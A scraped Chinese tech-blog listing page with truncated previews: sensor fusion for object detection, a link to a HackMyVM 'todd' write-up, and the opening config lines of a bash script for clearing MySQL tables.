1. 技术融合创新 多模态数据融合&#xff1a; 传感器融合&#xff1a;整合图像、激光雷达&#xff08;LiDAR&#xff09;、毫米波雷达等数据&#xff0c;提升检测精度和鲁棒性。例如&#xff0c;在自动驾驶中&#xff0c;通过融合视觉与LiDAR数据&#xff0c;实现三维目标检测…...

HackMyVM - todd记录

HackMyVM - toddhttps://mp.weixin.qq.com/s/E_-hepdfY-0veilL1fl2QA...

bash脚本手动清空mysql表数据

文章目录 1、bash脚本手动清空mysql表数据 1、bash脚本手动清空mysql表数据 #!/bin/bash# 配置区域&#xff08;修改此处&#xff09; MYSQL_USER"root" MYSQL_PASSWORD"123456" MYSQL_HOST"localhost" DATABASES("hps-base:base_test_ite…...